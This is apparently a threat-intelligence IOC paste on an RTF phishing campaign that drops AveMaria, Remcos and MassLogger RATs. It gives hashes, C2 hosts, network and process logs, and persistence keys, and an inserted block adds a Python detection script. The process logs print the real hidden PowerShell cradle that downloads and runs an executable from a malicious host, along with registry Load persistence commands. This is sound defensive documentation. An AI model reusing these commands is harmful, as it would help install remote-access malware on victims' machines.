VRad

#remcosrat_120721

Jul 13th, 2021 (edited)
#IOC #OptiData #VR #avemaria #remcos #RTF #OLE #powershell

https://pastebin.com/ZYZarB9L

previous_contact:
avemaria
20/07/20 https://pastebin.com/LV9NKUiy
17/02/20 https://pastebin.com/DCPutqaR

remcos
15/07/19 https://pastebin.com/ZxG6eRWM

FAQ:
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

attack_vector
--------------
email > attach .doc (RTF) > OLE > powershell > GET1 exe > %appdata%\svchost.exe > GET2 exe > %appdata%\FIemEnwKf.exe > exfil 37.0.11.114


email_headers
--------------
Received: from gmail.com (unknown [37.0.8.157])
From: Manager <mitul1.timurnetwork@gmail.com>
To: user00@victim77.org
Subject: URGENT: SUPPLY COMPLAIN / DAMAGES
Date: 12 Jul 2021 02:47:46 -0700
MIME-Version: 1.0


files
--------------
[RTF1]
*******
SHA-256 0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85
File name Picture1.doc [ Rich Text Format ]
File size 662.29 KB (678183 bytes)

SHA-256 538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a
File name svchost.exe [ .NET executable ] - AveMariaRAT
File size 465.50 KB (476672 bytes)

SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
File name explorer.exe [ Microsoft Visual C++ ] - Remcos RAT
File size 92.00 KB (94208 bytes)


[RTF2]
*******
SHA-256 68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95
File name Picture2.doc [ Rich Text Format ]
File size 662.30 KB (678199 bytes)

SHA-256 b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823
File name powerpoint.exe [ .NET executable ] - masslogger
File size 582.50 KB (596480 bytes)

SHA-256 04cde0c2284cc4dc8f8a5aeadafca6819ab9d11dfb76fb7f3a2fbbf91d3c0e5d
File name svchost.exe [ .NET executable ]
File size 684.00 KB (700416 bytes)

SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
File name AFdCieIpH.exe [ Microsoft Visual C++ ] - Remcos RAT
File size 92.00 KB (94208 bytes)


activity
**************
PL_SCR httP://kqz.ugo.si/svchost.exe [RTF1]
httP://kqz.ugo.si/powerpoint.exe [RTF2]

C2 byx.z86.ru 37.0.11.114
hgoz.12v.si 37.0.11.114


netwrk
--------------
[RTF1]
*******
37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1 Mozilla/4.0
37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1


[RTF2]
*******
37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1 Mozilla/4.0
37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1
37.0.11.114 hgoz.12v.si GET /rem.exe HTTP/1.1 Mozilla/4.0

comp
--------------
[RTF1]
*******
WINWORD.EXE 3328 TCP 37.0.11.114 80 ESTABLISHED
powershell.exe 3828 TCP 37.0.11.114 80 ESTABLISHED

svchost.exe 1404 TCP 37.0.11.114 5200 ESTABLISHED
svchost.exe 1404 TCP 37.0.11.114 80 ESTABLISHED
explorer.exe 2080 TCP 37.0.11.114 2404 ESTABLISHED


[RTF2]
*******
WINWORD.EXE 3836 TCP 37.0.11.114 80 ESTABLISHED
explorer.exe 3152 TCP 37.0.11.114 2404 ESTABLISHED
svchost.exe 816 TCP 37.0.11.114 5200 ESTABLISHED
svchost.exe 816 TCP 37.0.11.114 80 ESTABLISHED

proc
--------------
[RTF1]
*******
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
C:\Users\operator\AppData\Roaming\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
C:\tmp\svchost.exe
C:\Users\operator\AppData\Roaming\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Users\operator\AppData\Roaming\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
C:\Users\operator\AppData\Roaming\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Users\operator\AppData\Roaming\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
C:\tmp\svchost.exe
C:\tmp\svchost.exe
C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
C:\Windows\SysWOW64\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
C:\Users\operator\AppData\Roaming\svchost.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
C:\tmp\svchost.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\operator\AppData\Roaming\FIemEnwKf.exe
C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
C:\Users\operator\AppData\Roaming\windows\explorer.exe


[RTF2]
*******
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/powerpoint.exe','C:\Users\operator\AppData\Roaming\powerpoint.exe');Start-Process 'C:\Users\operator\AppData\Roaming\powerpoint.exe'"
C:\Users\operator\AppData\Roaming\powerpoint.exe
C:\tmp\powerpoint.exe
C:\tmp\powerpoint.exe
C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
C:\Users\operator\AppData\Roaming\svchost.exe
C:\tmp\svchost.exe
C:\tmp\svchost.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\operator\AppData\Roaming\AFdCieIpH.exe
C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
C:\Users\operator\AppData\Roaming\windows\explorer.exe

persist
--------------
[RTF1]
*******
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 13.07.2021 10:39
C:\Users\operator\AppData\Roaming\svchost.exe Firefox Mozilla c:\users\operator\appdata\roaming\svchost.exe 13.07.2021 0:03


HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:40
pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50


[RTF2]
*******
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:37
pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
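Added detection example (not part of the original paste): a small Python check that flags, in process-creation records, the two behaviours recorded in the proc and persist sections above, the Office-spawned hidden PowerShell download cradle that drops into %appdata%, and the REG ADD to the HKCU ...\CurrentVersion\Windows\Load value. The sample records are constructed, and the download host (example.invalid) is a placeholder rather than the paste's real one.

```python
import re

# Constructed sample process-creation records: (parent image, command line).
# The download host example.invalid is a placeholder, not the real one.
SAMPLE_EVENTS = [
    ("WINWORD.EXE",
     "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI "
     "-W Hidden -ExecutionPolicy bypass -NoLogo -command \"(New-Object System.Net.WebClient)"
     ".DownloadFile('http://example.invalid/svchost.exe',"
     "'C:\\Users\\operator\\AppData\\Roaming\\svchost.exe')\""),
    ("svchost.exe",
     "C:\\Windows\\SysWOW64\\reg.exe ADD \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion"
     "\\Windows\" /f /v Load /t REG_SZ /d \"C:\\Users\\operator\\AppData\\Roaming\\svchost.exe\""),
    ("explorer.exe",
     "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Test-Connection www.google.com"),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Download cradle: a WebClient or Invoke-WebRequest fetch in the command line.
CRADLE_RE = re.compile(r"downloadfile\(|downloadstring\(|invoke-webrequest|\biwr\b", re.I)
# Evasion switches seen in the paste: hidden window and/or execution-policy bypass.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-executionpolicy\s+bypass", re.I)
# Persistence through the 'Load' value under ...\CurrentVersion\Windows (reg.exe or cmd /c REG).
LOAD_RE = re.compile(r"currentversion\\windows\"?\s.*?/v\s+load\b", re.I)
# Drop location used by both chains: an .exe written under the roaming profile.
APPDATA_RE = re.compile(r"\\appdata\\roaming\\[^'\"\\]+\.exe", re.I)


def classify(parent, cmdline):
    """Return the detection tags that apply to one process-creation record."""
    tags = []
    low = cmdline.lower()
    if "powershell" in low and CRADLE_RE.search(low) and HIDDEN_RE.search(low):
        tags.append("hidden_powershell_download_cradle")
        if APPDATA_RE.search(low):
            tags.append("drops_to_appdata")
        if parent.lower() in OFFICE_PARENTS:
            tags.append("office_parent")
    if LOAD_RE.search(low):
        tags.append("windows_load_persistence")
    return tags


def scan(events):
    """Return (parent, command line, tags) for every record that fired at least one tag."""
    hits = []
    for parent, cmdline in events:
        tags = classify(parent, cmdline)
        if tags:
            hits.append((parent, cmdline, tags))
    return hits
```

The plain `Test-Connection` PowerShell launches in the paste produce no tag on their own; they only matter as context once a cradle or Load write has fired.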

drop
--------------
[RTF1]
*******
%appdata%\svchost.exe
%tmp%\svchost.exe

%appdata%\FIemEnwKf.exe
%appdata%\windows\explorer.exe

[RTF2]
*******
%appdata%\powerpoint.exe
%tmp%\powerpoint.exe
%tmp%\svchost.exe
%appdata%\AFdCieIpH.exe
%appdata%\windows\explorer.exe


# # #
VT details

RTF1
*******
https://www.virustotal.com/gui/file/0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85/details
https://www.virustotal.com/gui/file/538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a/details
https://www.unpac.me/results/b9e19690-4c56-4150-965d-8463b8505682
https://analyze.intezer.com/analyses/9ef6d317-1ffe-4698-9a0e-9a96e1b7c0dd
https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215

RTF2
*******
https://www.virustotal.com/gui/file/68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95/details
https://www.virustotal.com/gui/file/b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823/details
https://www.unpac.me/results/a2582bf5-9003-4650-bcbc-135f13d6c47c
https://analyze.intezer.com/analyses/38ba4b0f-e0d8-4791-8fdb-59d31fca75c2
https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215

VR